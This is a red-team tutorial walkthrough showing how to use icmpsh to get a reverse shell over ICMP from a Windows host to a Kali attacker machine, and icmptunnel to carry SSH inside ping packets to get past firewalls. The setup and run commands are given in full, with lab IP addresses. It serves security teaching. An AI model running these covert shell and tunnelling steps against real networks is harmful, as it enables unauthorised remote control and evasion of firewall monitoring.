Categories

Archives

Red Teaming

Command and Control & Tunnelling via ICMP

In this article, you will learn about the RED TEAM Operation for data exfiltration via ICMP-C2 and ICMP Tunneling because both approaches are useful in order to circumvent firewall rules because they generate unsound traffic in the network.

Table of Content

Brief Summary on working of ICMP Protocol

Command & Control via ICMP Protocol

  • Requirement
  • icmpsh: C2-channel & Its Installation
  • Run icmpsh as Master
  • Run icmpsh as Slave

ICMP Tunneling

  • Requirement
  • Configure ICMP over Server Machine (Target)
  • Configure ICMP tunnel over Client Machine (Intruder)
  • Connect SSH Over ICMP

Brief Summary on working of  ICMP Protocol

 The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.

It is layer 3 i.e. network layer protocol used by the ping command for sending a message through ICMP payload which is encapsulated with IP Header Packet.  According to MTU the size of the ICMP packet cannot be greater than 1500 bytes.

ICMP packet at Network layer

IP header ICMP header ICMP payload size   MTU (1500)
20 bytes 8 bytes 1472 bytes  (maximum) 20 + 8 + 1472 = 1500

A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.

Read more from here

Command & Control via ICMP Protocol

In our many publications, we had discussed over C2-channel who is additionally acknowledged as command & control so you may find out it here. Although you are pleased to learn how to use ICMP protocol as a command & control channel between this thesis.

A cyber-war is strolling of Intruder and Security researcher, therefore, we need to hold partial backup plan. As we all know the company has grown to be smarter, they understand such as type concerning attack is being observed after achieving TCP reverse connection of the machine.

Thus we come up with ICMP secret shell which and use icmpsh as command & control tool.

REQUIREMENT

  • Attacker Machine or C2-channel:192.168.1.108 (Kali Linux)
  • Host machine:192.168.1.106 (Windows 10)

icmpsh: C2-channel & Its Installation

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open-source tools is that it does not require administrative privileges to run onto the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by Nico Leidecker and later it also gets ported into Python too.

It is very easy to install and use as c2-channel. Turn the attacker machine for icmpsh and download icmpsh from Github.

git clone https://github.com/inquisb/icmpsh.git

Run icmpsh as Master (Kali Linux)

Once the downloads have been completed, you can use the following command to run the master. The most important step before taking action is to disable ping reply on your machine. This prevents the kernel from responding to ping packets itself.

sysctl -w net.ipv4.icmp_echo_ignore_all=1
cd icmpsh
syntax: ./icmpsh_m.py <attacker’s-IP> <target-IP>
./icmpsh_m.py 192.168.1.108 192.168.1.106

Run icmpsh as slave (Windows 10)

Now again install icmpsh tool inside the host machine for running as slave and the user running the slave on the target system does not require administrative privileges.

And then run the following command :

syntax: icmpsh.exe -t <Kali IP>
icmpsh.exe -t 192.168.1.108

Once the above command is executed on the host machine, the intrude will have reverse shell of the machine running as a slave’s . You can observe from the image given below that the machine controls the slave machine by spawning its prompt of command.

Now as we said that with the help ping, icmpsh will get the host machine’s reverse shell over the icmp channel. Therefore, I simply trigger a command and use Wireshark to capture its packet to ensure the backend process.

Great!! This works exactly as we assumed and the data is transmitted over the network layer with the help of PING request/reply packets, thus no service or port is required. The traffic is undetected by proxy-based firewalls and this may bypass firewall rules.

ICMP Tunneling

ICMP tunnel is an approach that works by tunneling TCP connections over ICMP packets. Here we will access ssh session that will be encapsulated by ICMP packets. Hence again a tcp connection will be established at layer 3 i.e. network layer which will be encapsulated as icmp payload and this could be helpful to bypass firewall rule.

REQUIREMENT

 Server Machine

  • ens33:192.168.1.108
  • tun0:10.0.0.1

Client Machine

  • eth0: 192.168.1.111
  • tun0:10.0.0.2

icmptunnel is a tool to tunnel IP traffic within ICMP echo request and response (ping) packets. It’s intended for bypassing firewalls in a semi-covert way, for example when pivoting inside a network where ping is allowed. It might also be useful for egress from a corporate network to the Internet, although it is quite common for ICMP echo traffic to be filtered at the network perimeter.

While there are a couple of existing tools which implement this technique, icmptunnel provides a more reliable protocol and a mechanism for tunneling through stateful firewalls and NAT.

Configure ICMP over Server Machine (Target)

Download and install icmptunnel on the host machine and compile the file as followed in the image given below

git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel
make

First, disable ICMP echo reply on both the client and server. This foils the kernel from responding to ping packets itself.

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

On the server-side (host machine), start icmptunnel in server mode, and assign an IP address to the new tunnel interface.

./icmptunnel -s
Ctrlz
bg
/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
ifconfig

Configure ICMP tunnel over Client Machine (Intruder)

Similarly, repeat the same process over the intruder machine to install icmptunnel for peer to peer connection.

git clone https://github.com/jamesbarlow/icmptunnel.git

First, compile it and then disable ICMP echo reply to avoid kernel from responding to ping packets itself.

cd icmptunnel
make
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./icmptunnel 192.168.1.108
ctrl z
/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

Connect SSH Over ICMP

You should have a point-to-point tunnel at this point through ICMP packets. There is 10.0.0.1 on the server-side and 10.0.0.2 on the client-side. Try to connect to the server via SSH a tcp protocol on the client:

ssh raj@10.0.0.1

The icmp tunnel is connected between server and client at the initial phase, which could be seen in the following image where we captured the traffic flowing between server and client with the help of Wireshark.

Every traffic is ICMP. The packet HTTP / IP can be regarded as part of the ICMP payload. The HTTP/IP packets are accelerated to the internet. Notice in what way the source IP has been impersonated because of nat. Thus, the traffic will not go on the transport layer for connecting SSH via port 22.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

One thought on “Command and Control & Tunnelling via ICMP

  1. How to get mac address of an ip which is not showing through ip scanner but -Pn showing host is live?

Comments are closed.